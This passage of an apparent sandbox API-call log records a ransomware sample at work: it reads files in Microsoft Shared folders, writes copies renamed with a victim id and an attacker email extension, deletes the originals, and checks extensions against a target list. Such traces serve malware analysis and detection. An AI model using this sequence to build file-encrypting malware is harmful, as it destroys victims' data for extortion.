lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe0, lpOverlapped=0x0) returned 1 [0055.169] SetEndOfFile (hFile=0x1f0) returned 1 [0055.169] CloseHandle (hObject=0x1f0) returned 1 [0055.169] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.169] SetEndOfFile (hFile=0x21c) returned 1 [0055.170] CloseHandle (hObject=0x21c) returned 1 [0055.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0055.170] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg")) returned 1 [0055.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0055.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0055.170] lstrlenW (lpString=".doc") returned 4 [0055.170] lstrcmpiW (lpString1=".doc", lpString2=".WPG") returned -1 [0055.170] lstrlenW (lpString=".docx") returned 5 [0055.170] lstrcmpiW (lpString1=".docx", lpString2="S.WPG") returned -1 [0055.170] lstrlenW (lpString=".pdf") returned 4 [0055.170] lstrcmpiW (lpString1=".pdf", lpString2=".WPG") returned -1 [0055.171] lstrlenW (lpString=".xls") returned 4 [0055.171] lstrcmpiW (lpString1=".xls", lpString2=".WPG") returned 1 [0055.171] lstrlenW (lpString=".xlsx") returned 5 [0055.171] lstrcmpiW (lpString1=".xlsx", lpString2="S.WPG") returned -1 [0055.171] lstrlenW (lpString=".ppt") returned 4 [0055.171] lstrcmpiW (lpString1=".ppt", lpString2=".WPG") returned -1 [0055.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0055.171] lstrlenW (lpString=".zip") returned 4 [0055.171] lstrcmpiW (lpString1=".zip", lpString2=".WPG") returned 1 [0055.171] lstrlenW (lpString=".rar") returned 4 [0055.171] lstrcmpiW (lpString1=".rar", lpString2=".WPG") returned -1 [0055.171] lstrlenW (lpString=".bz2") returned 4 [0055.171] lstrcmpiW (lpString1=".bz2", lpString2=".WPG") returned -1 [0055.171] lstrlenW (lpString=".7z") returned 3 [0055.171] lstrcmpiW (lpString1=".7z", lpString2="WPG") returned -1 [0055.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0055.171] lstrlenW (lpString=".dbf") returned 4 [0055.171] lstrcmpiW (lpString1=".dbf", lpString2=".WPG") returned -1 [0055.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0055.171] lstrlenW (lpString=".1cd") returned 4 [0055.171] lstrcmpiW (lpString1=".1cd", lpString2=".WPG") returned -1 [0055.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0055.171] lstrlenW (lpString=".jpg") returned 4 [0055.171] lstrcmpiW (lpString1=".jpg", lpString2=".WPG") returned -1 [0055.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0055.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0055.171] lstrlenW (lpString=".doc") returned 4 [0055.171] lstrcmpiW (lpString1=".doc", lpString2=".WPG") returned -1 [0055.171] lstrlenW (lpString=".docx") returned 5 [0055.171] lstrcmpiW (lpString1=".docx", lpString2="S.WPG") returned -1 [0055.171] lstrlenW (lpString=".pdf") returned 4 [0055.171] lstrcmpiW (lpString1=".pdf", lpString2=".WPG") returned -1 [0055.171] lstrlenW (lpString=".xls") returned 4 [0055.171] lstrcmpiW (lpString1=".xls", lpString2=".WPG") returned 1 [0055.171] lstrlenW (lpString=".xlsx") returned 5 [0055.172] lstrcmpiW (lpString1=".xlsx", lpString2="S.WPG") returned -1 [0055.172] lstrlenW (lpString=".ppt") returned 4 [0055.172] lstrcmpiW (lpString1=".ppt", lpString2=".WPG") returned -1 [0055.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0055.172] lstrlenW (lpString=".zip") returned 4 [0055.172] lstrcmpiW (lpString1=".zip", lpString2=".WPG") returned 1 [0055.172] lstrlenW (lpString=".rar") returned 4 [0055.172] lstrcmpiW (lpString1=".rar", lpString2=".WPG") returned -1 [0055.172] lstrlenW (lpString=".bz2") returned 4 [0055.172] lstrcmpiW (lpString1=".bz2", lpString2=".WPG") returned -1 [0055.172] lstrlenW (lpString=".7z") returned 3 [0055.172] lstrcmpiW (lpString1=".7z", lpString2="WPG") returned -1 [0055.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0055.172] lstrlenW (lpString=".dbf") returned 4 [0055.172] lstrcmpiW (lpString1=".dbf", lpString2=".WPG") returned -1 [0055.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0055.172] lstrlenW (lpString=".1cd") returned 4 [0055.172] lstrcmpiW (lpString1=".1cd", lpString2=".WPG") returned -1 [0055.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0055.172] lstrlenW (lpString=".jpg") returned 4 [0055.172] lstrcmpiW (lpString1=".jpg", lpString2=".WPG") returned -1 [0055.172] lstrcmpiW (lpString1=".FLT", lpString2=".USA") returned -1 [0055.172] lstrlenW (lpString="PICTIM32.FLT") returned 12 [0055.172] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.173] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=73080) returned 1 [0055.173] CloseHandle (hObject=0x21c) returned 1 [0055.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt")) returned 0x20 [0055.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0055.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.173] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.173] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0055.173] GetLastError () returned 0x0 [0055.173] ReadFile (in: hFile=0x21c, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x11d78, lpOverlapped=0x0) returned 1 [0055.182] WriteFile (in: hFile=0x1f0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x11d80, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x11d80, lpOverlapped=0x0) returned 1 [0055.185] ReadFile (in: hFile=0x21c, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0055.185] WriteFile (in: hFile=0x1f0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.185] SetEndOfFile (hFile=0x1f0) returned 1 [0055.186] CloseHandle (hObject=0x1f0) returned 1 [0055.187] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.187] SetEndOfFile (hFile=0x21c) returned 1 [0055.188] CloseHandle (hObject=0x21c) returned 1 [0055.188] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0055.189] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt")) returned 1 [0055.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0055.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0055.189] lstrlenW (lpString=".doc") returned 4 [0055.189] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0055.189] lstrlenW (lpString=".docx") returned 5 [0055.189] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0055.189] lstrlenW (lpString=".pdf") returned 4 [0055.189] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0055.190] lstrlenW (lpString=".xls") returned 4 [0055.190] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0055.190] lstrlenW (lpString=".xlsx") returned 5 [0055.190] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0055.190] lstrlenW (lpString=".ppt") returned 4 [0055.190] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0055.190] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0055.190] lstrlenW (lpString=".zip") returned 4 [0055.190] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0055.190] lstrlenW (lpString=".rar") returned 4 [0055.190] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0055.190] lstrlenW (lpString=".bz2") returned 4 [0055.190] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0055.190] lstrlenW (lpString=".7z") returned 3 [0055.190] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0055.190] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0055.190] lstrlenW (lpString=".dbf") returned 4 [0055.190] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0055.190] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0055.190] lstrlenW (lpString=".1cd") returned 4 [0055.190] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0055.190] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0055.190] lstrlenW (lpString=".jpg") returned 4 [0055.190] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0055.190] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0055.190] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0055.190] lstrlenW (lpString=".doc") returned 4 [0055.190] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0055.190] lstrlenW (lpString=".docx") returned 5 [0055.190] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0055.190] lstrlenW (lpString=".pdf") returned 4 [0055.190] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0055.191] lstrlenW (lpString=".xls") returned 4 [0055.191] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0055.191] lstrlenW (lpString=".xlsx") returned 5 [0055.191] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0055.191] lstrlenW (lpString=".ppt") returned 4 [0055.191] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0055.191] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0055.191] lstrlenW (lpString=".zip") returned 4 [0055.191] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0055.191] lstrlenW (lpString=".rar") returned 4 [0055.191] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0055.191] lstrlenW (lpString=".bz2") returned 4 [0055.191] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0055.191] lstrlenW (lpString=".7z") returned 3 [0055.191] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0055.191] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0055.191] lstrlenW (lpString=".dbf") returned 4 [0055.191] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0055.191] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0055.191] lstrlenW (lpString=".1cd") returned 4 [0055.191] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0055.191] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0055.191] lstrlenW (lpString=".jpg") returned 4 [0055.191] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0055.191] lstrcmpiW (lpString1=".FLT", lpString2=".USA") returned -1 [0055.191] lstrlenW (lpString="PNG32.FLT") returned 9 [0055.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0055.739] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=302976) returned 1 [0055.739] CloseHandle (hObject=0x224) returned 1 [0055.739] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt")) returned 0x20 [0055.739] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0055.740] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0055.740] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.740] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.740] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0055.740] GetLastError () returned 0x0 [0055.740] ReadFile (in: hFile=0x224, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x49f80, lpOverlapped=0x0) returned 1 [0055.747] WriteFile (in: hFile=0x248, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x49f90, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x49f90, lpOverlapped=0x0) returned 1 [0055.752] ReadFile (in: hFile=0x224, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0055.752] WriteFile (in: hFile=0x248, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0055.753] SetEndOfFile (hFile=0x248) returned 1 [0055.753] CloseHandle (hObject=0x248) returned 1 [0055.753] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.753] SetEndOfFile (hFile=0x224) returned 1 [0055.756] CloseHandle (hObject=0x224) returned 1 [0055.756] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0055.756] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt")) returned 1 [0055.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0055.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0055.757] lstrlenW (lpString=".doc") returned 4 [0055.757] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0055.757] lstrlenW (lpString=".docx") returned 5 [0055.757] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0055.757] lstrlenW (lpString=".pdf") returned 4 [0055.757] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0055.757] lstrlenW (lpString=".xls") returned 4 [0055.757] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0055.757] lstrlenW (lpString=".xlsx") returned 5 [0055.757] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0055.757] lstrlenW (lpString=".ppt") returned 4 [0055.757] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0055.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0055.757] lstrlenW (lpString=".zip") returned 4 [0055.757] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0055.757] lstrlenW (lpString=".rar") returned 4 [0055.757] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0055.757] lstrlenW (lpString=".bz2") returned 4 [0055.757] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0055.757] lstrlenW (lpString=".7z") returned 3 [0055.757] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0055.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0055.757] lstrlenW (lpString=".dbf") returned 4 [0055.757] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0055.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0055.757] lstrlenW (lpString=".1cd") returned 4 [0055.757] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0055.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0055.757] lstrlenW (lpString=".jpg") returned 4 [0055.757] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0055.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0055.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0055.758] lstrlenW (lpString=".doc") returned 4 [0055.758] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0055.758] lstrlenW (lpString=".docx") returned 5 [0055.758] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0055.758] lstrlenW (lpString=".pdf") returned 4 [0055.758] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0055.758] lstrlenW (lpString=".xls") returned 4 [0055.758] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0055.758] lstrlenW (lpString=".xlsx") returned 5 [0055.758] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0055.758] lstrlenW (lpString=".ppt") returned 4 [0055.758] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0055.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0055.758] lstrlenW (lpString=".zip") returned 4 [0055.758] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0055.758] lstrlenW (lpString=".rar") returned 4 [0055.758] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0055.758] lstrlenW (lpString=".bz2") returned 4 [0055.758] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0055.758] lstrlenW (lpString=".7z") returned 3 [0055.758] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0055.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0055.758] lstrlenW (lpString=".dbf") returned 4 [0055.758] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0055.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0055.758] lstrlenW (lpString=".1cd") returned 4 [0055.758] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0055.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0055.758] lstrlenW (lpString=".jpg") returned 4 [0055.758] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0055.759] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0055.759] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0055.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0055.760] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=3584) returned 1 [0055.760] CloseHandle (hObject=0x224) returned 1 [0055.760] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui")) returned 0x20 [0055.760] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0055.760] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0055.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0055.761] lstrlenW (lpString=".doc") returned 4 [0055.761] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.761] lstrlenW (lpString=".docx") returned 5 [0055.761] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.761] lstrlenW (lpString=".pdf") returned 4 [0055.761] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.761] lstrlenW (lpString=".xls") returned 4 [0055.761] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.761] lstrlenW (lpString=".xlsx") returned 5 [0055.761] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.761] lstrlenW (lpString=".ppt") returned 4 [0055.761] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0055.761] lstrlenW (lpString=".zip") returned 4 [0055.761] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.761] lstrlenW (lpString=".rar") returned 4 [0055.761] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.761] lstrlenW (lpString=".bz2") returned 4 [0055.761] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.761] lstrlenW (lpString=".7z") returned 3 [0055.761] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0055.761] lstrlenW (lpString=".dbf") returned 4 [0055.761] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0055.761] lstrlenW (lpString=".1cd") returned 4 [0055.761] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0055.761] lstrlenW (lpString=".jpg") returned 4 [0055.761] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0055.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 